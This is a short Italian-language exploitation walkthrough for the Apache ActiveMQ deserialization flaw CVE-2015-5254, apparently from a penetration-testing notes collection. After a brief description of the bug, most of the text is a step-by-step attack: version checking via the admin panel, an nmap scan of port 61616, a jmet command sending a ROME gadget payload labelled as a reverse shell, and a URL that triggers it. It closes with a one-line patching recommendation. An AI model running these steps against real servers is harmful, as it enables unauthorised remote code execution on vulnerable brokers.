
ActiveMQ_CVE-2015-5254
Deserializzazione di ActiveMQ (CVE-2015-5254)
Descrizione della vulnerabilità: esiste una vulnerabilità di sicurezza nelle versioni 5.x precedenti ad Apache ActiveMQ 5.13.0. La vulnerabilità deriva dal fatto che il programma non limita le classi che possono essere serializzate nel broker. Un utente malintenzionato remoto può eseguire codice arbitrario utilizzando un oggetto Java Message Service (JMS) ObjectMessage serializzato appositamente predisposto.
Versioni affette: versioni 5.x di Apache ActiveMQ precedenti alla 5.13.0
0x01 Accedi al pannello di amministrazione per determinare la versione: http://IP:8161

0x02 Determina se la porta 61616 è aperta:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 Invia il payload di reverse shell:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 Clicca per attivare Browse event - ID del messaggio, ottenendo una reverse shell riuscita:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

Raccomandazione di riparazione: aggiornare all'ultima versione, configurare regole WAF appropriate per bloccare.